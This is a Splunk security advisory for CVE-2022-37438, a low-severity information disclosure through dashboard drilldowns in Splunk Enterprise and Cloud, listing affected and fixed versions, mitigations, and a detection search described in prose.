Advisory ID: SVD-2022-0802 Published: 2022-08-16 CVSSv3.1 Score: 2.6, Low CWE: CWE-200 | CVE ID: CVE-2022-37438 Last Update: 2022-08-16 CVSSv3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N Bug ID: SPL-221531 Security Content: Splunk account discovery drilldown dashboard disclosure |
In Splunk Enterprise versions in the following table, an authenticated user can craft a dashboard that could potentially leak information (for example, username, email, and real name) about Splunk users, when visited by another user through the drilldown component. The vulnerability requires user access to create and share dashboards using Splunk Web.
For Splunk Enterprise, upgrade versions to 8.1.11, 8.2.7.1, 9.0.1, or higher.
For Splunk Cloud Platform customers, Splunk is actively patching and monitoring Splunk Cloud instances.
Product | Version | Component | Affected Version | Fixed Version |
---|---|---|---|---|
Splunk Enterprise | 8.1 | Splunk Web | 8.1.10 and lower | 8.1.11 |
Splunk Enterprise | 8.2 | Splunk Web | 8.2.0 to 8.2.7 | 8.2.7.1 |
Splunk Enterprise | 9.0 | Splunk Web | 9.0.0 | 9.0.1 |
Splunk Cloud Platform | - | Splunk Web | 8.2.2203.4 and lower | 9.0.2205 |
You can mitigate this vulnerability by configuring permissions for dashboards and the knowledge objects that drive them.
Splunk account discovery drilldown dashboard disclosure
This search uses REST functionality to query for dashboards with environment variables present in URL options that could potentially leak information about Splunk users. If an analyst sees results from this search we suggest investigating to determine if the disclosure of these environmental variables was intended.
Splunk rates the severity as Low, 2.6 with the vector CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N. If the Splunk Enterprise instance disabled Splunk Web, it is not impacted and the vulnerability is informational.
Eric LaMothe at Splunk